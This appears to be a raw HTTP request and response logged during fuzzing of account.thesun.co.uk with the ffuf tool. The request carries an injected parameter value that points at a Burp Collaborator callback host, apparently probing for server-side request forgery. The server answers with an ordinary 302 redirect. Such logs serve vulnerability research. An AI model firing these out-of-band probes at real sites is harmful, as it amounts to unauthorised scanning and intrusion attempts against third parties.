GET /?array=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142a784c6f563b-SIN
Cf-Request-Id: 098078df2f0000563b41b0c000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:31 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142a784c6f563b
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 178be19c7cf00dbe
Ot-Tracer-Traceid: 6fed1eb44a1bef61
Server: cloudflare
Set-Cookie: __cfduid=d989a876eeb195c64654954e569bced641618646910; expires=Mon, 17-May-21 08:08:30 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: 1abb19e3b7a35156c639
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/